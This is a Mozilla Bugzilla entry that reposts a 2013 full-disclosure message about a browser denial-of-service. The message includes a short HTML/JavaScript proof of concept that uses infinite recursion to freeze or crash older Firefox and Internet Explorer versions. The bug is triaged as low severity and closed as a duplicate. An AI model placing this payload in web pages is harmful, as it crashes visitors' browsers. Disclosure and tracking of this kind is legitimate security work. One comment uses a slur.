Closed Bug 883818 Opened 11 years ago Closed 4 years ago

DoS vulnerability in Mozilla Firefox

Categories

(Core :: Security, defect)

19 Branch
defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 612029

People

(Reporter: curtisk, Unassigned)

Details

(Keywords: csectype-oom, sec-low)

http://seclists.org/fulldisclosure/2013/Jun/121
-----//-----
From: "MustLive" <mustlive () websecurity com ua>
Date: Sat, 15 Jun 2013 21:02:26 +0300
-----//-----
Hello list!

I want to warn you about Denial of Service vulnerability in Mozilla Firefox and Microsoft Internet Explorer.


Earlier Jean Pascal Pereira has found DoS vulnerability in browser Firefox 14.0.1 (http://1337day.com/exploit/description/19201). And at 07.04.2013 I've checked this vulnerability and found, that many other browsers are vulnerable to these attack.


-------------------------
Affected products:
-------------------------

Vulnerable are Mozilla Firefox 3.5.19, 3.6.28, 10.0.7 ESR, 15.0.1, Internet Explorer 7 (7.00.5730.13) and Internet Explorer 8 (8.00.6001.18702). And also must be vulnerable previous versions of these browsers and potentially more newer versions of Firefox and Internet Explorer.


----------
Details:
----------

Denial of Service (WASC-10):

The attack occurs via infinite recursion. Which leads to RAM consuming.

My version of the exploit for different browsers.

Mozilla Firefox & IE DoS Exploit.html

<html>
<head>

<title>Mozilla Firefox 3.5.19 - 15.0.1, IE7 and IE8 DoS Exploit (C) 2013 MustLive. http://websecurity.com.ua</title> <!-- Based on exploit by Jean Pascal Pereira (http://1337day.com/exploit/description/19201) -->

</head>
<body>
<script>
function e(x) {
document.body.innerHTML += x;
e(x + 'x');
}
e('x')
</script>
</body>
</html>

Browser crash works in Firefox 10.0.7 ESR and 15.0.1, but doesn't work in 3.0.19 and previous versions. In Firefox 3.5.19 and 3.6.28, IE7 and IE8 there is only freezing.


Best wishes & regards,
MustLive
Administrator of Websecurity web site

http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
DOS issues don't need to remain private.
Group: core-security
Keywords: csec-oom, sec-low
Whiteboard: DUPEME
He exactly copied the PoC from Jean Pascal, added " <!-- Based on exploit by Jean Pascal Pereira (http://1337day.com/exploit/description/19201) -->" to the <title> tag and called it "his version of this exploit for different browsers". This is completely retarded.
dupe of bug 612029?
No longer blocks: eviltraps
Status: UNCONFIRMED → RESOLVED
Closed: 4 years ago
Resolution: --- → DUPLICATE
Whiteboard: DUPEME
You need to log in before you can comment on or make changes to this bug.